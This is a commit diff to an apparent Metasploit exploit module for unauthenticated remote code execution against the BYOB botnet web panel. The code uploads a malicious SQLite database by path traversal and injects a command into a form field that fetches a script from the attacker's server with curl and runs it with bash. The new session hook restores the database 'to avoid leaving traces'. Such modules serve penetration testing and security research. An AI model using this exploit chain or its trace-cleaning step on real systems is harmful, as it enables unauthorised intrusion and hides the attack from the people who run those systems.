Add suggestions + clean database files during on_new_session

Chocapikk · Chocapikk · commit 2304bde90782 · 2024-09-26T23:48:51.000+02:00
diff --git a/modules/exploits/unix/webapp/byob_unauth_rce.rb b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -88,6 +88,24 @@ def handle_request(cli, request, response_payload)
   end
 
   def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'keep_cookies' => true
+    })
+
+    if res
+      doc = res.get_html_document
+
+      unless doc.at('title')&.text&.include?('Build Your Own Botnet') || doc.at('meta[name="description"]')&.attr('content')&.include?('Build Your Own Botnet')
+        return CheckCode::Safe('The target does not appear to be BYOB.')
+      end
+    else
+      return CheckCode::Unknown('The target did not respond to the initial check.')
+    end
+
+    print_good('The target appears to be BYOB.')
+
     random_data = Rex::Text.rand_text_alphanumeric(32)
     random_filename = Rex::Text.rand_text_alphanumeric(16)
     random_owner = Rex::Text.rand_text_alphanumeric(8)
@@ -112,16 +130,16 @@ def check
     })
 
     if res&.code == 500
-      CheckCode::Vulnerable
-    case res&.code
-    when 500
-      CheckCode::Vulnerable
-    when 200
-      CheckCode::Safe
-    when nil
-      CheckCode::Unknown("The target did not respond.")
+      return CheckCode::Vulnerable
     else
-      CheckCode::Unknown("The target responded with HTTP status #{res.code}")
+      case res&.code
+      when 200
+        return CheckCode::Safe
+      when nil
+        return CheckCode::Unknown('The target did not respond.')
+      else
+        return CheckCode::Unknown("The target responded with HTTP status #{res.code}")
+      end
     end
   end
 
@@ -157,7 +175,13 @@ def register_user(username, password)
       'keep_cookies' => true
     })
 
-    res&.code == 302 ? print_good('Registered user!') : fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, 'No response from the server.')
+    elsif res.code == 302
+      print_good('Registered user!')
+    else
+      fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")
+    end
   end
 
   def login_user(username, password)
@@ -176,10 +200,16 @@ def login_user(username, password)
       'keep_cookies' => true
     })
 
-    res&.code == 302 ? print_good('Logged in successfully!') : fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, 'No response from the server.')
+    elsif res.code == 302
+      print_good('Logged in successfully!')
+    else
+      fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")
+    end
   end
 
-  def generate_malicious_db(_username, _password)
+  def generate_malicious_db
     mem_db = SQLite3::Database.new(':memory:')
 
     mem_db.execute <<-SQL
@@ -267,7 +297,7 @@ module VARCHAR(15) NOT NULL,
       backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
       backup.step(-1)
       backup.finish
-  
+
       binary_data = File.binread(file.path)
 
       Rex::Text.encode_base64(binary_data)
@@ -276,8 +306,8 @@ module VARCHAR(15) NOT NULL,
     base64_data
   end
 
-  def upload_database_multiple_paths(encoded_db)
-    success = false
+  def upload_database_multiple_paths
+    successful_paths = []
     filepaths = [
       '/proc/self/cwd/buildyourownbotnet/database.db',
       '/proc/self/cwd/../buildyourownbotnet/database.db',
@@ -288,10 +318,8 @@ def upload_database_multiple_paths(encoded_db)
     ]
 
     filepaths.each do |filepath|
-      vprint_status("Trying to upload database to path: #{filepath}")
-
       form_data = {
-        'data' => encoded_db,
+        'data' => @encoded_db,
         'filename' => filepath,
         'type' => 'txt',
         'owner' => Faker::Internet.username,
@@ -307,15 +335,37 @@ def upload_database_multiple_paths(encoded_db)
         'keep_cookies' => true
       )
 
-      if res&.code == 200
-        print_good("Database uploaded successfully to path: #{filepath}")
-        success = true
+      successful_paths << filepath if res&.code == 200
+    end
+
+    successful_paths
+  end
+
+  def on_new_session(session)
+    if session.type == 'meterpreter'
+      binary_content = Rex::Text.decode_base64(@encoded_db)
+
+      print_status('Restoring the database via Meterpreter to avoid leaving traces.')
+
+      successful_restore = false
+
+      @successful_paths.each do |remote_path|
+        remote_file = session.fs.file.new(remote_path, 'wb')
+        remote_file.syswrite(binary_content)
+        remote_file.close
+        successful_restore = true
+      rescue ::StandardError => e
+        print_error("Failed to restore the database: #{e.class} #{e}")
+      end
+
+      if successful_restore
+        print_good('Database has been successfully restored to its clean state.')
       else
-        vprint_error("Failed to upload database to path: #{filepath}")
+        print_error('Failed to restore the database on all attempted paths.')
       end
+    else
+      print_error('This is not a Meterpreter session. Cannot proceed with database reset.')
     end
-
-    success
   end
 
   def exploit
@@ -329,12 +379,15 @@ def exploit
 
     # Generate and upload the malicious SQLite database
     print_status('Generating malicious SQLite database.')
-    encoded_db = generate_malicious_db(username, password)
+    @encoded_db = generate_malicious_db
+
+    @successful_paths = upload_database_multiple_paths
 
-    unless upload_database_multiple_paths(encoded_db)
+    if @successful_paths.empty?
       fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')
+    else
+      print_good("Malicious database uploaded successfully to the following paths: #{@successful_paths.join(', ')}")
     end
-    print_good('Malicious database uploaded successfully.')
 
     # Register the new admin user
     print_status("Registering a new admin user: #{username}:#{password}")
@@ -350,7 +403,6 @@ def exploit
     uri = get_uri.gsub(%r{^https?://}, '').chomp('/')
     random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
     malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"
-
     payload_data = {
       'format' => 'exe',
       'operating_system' => "nix$(#{malicious_filename})",
@@ -364,7 +416,7 @@ def exploit
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => payload_data,
       'keep_cookies' => true
-    }, 0)
+    }, 5)
 
     # Keep the web server running to maintain the service
     service.wait
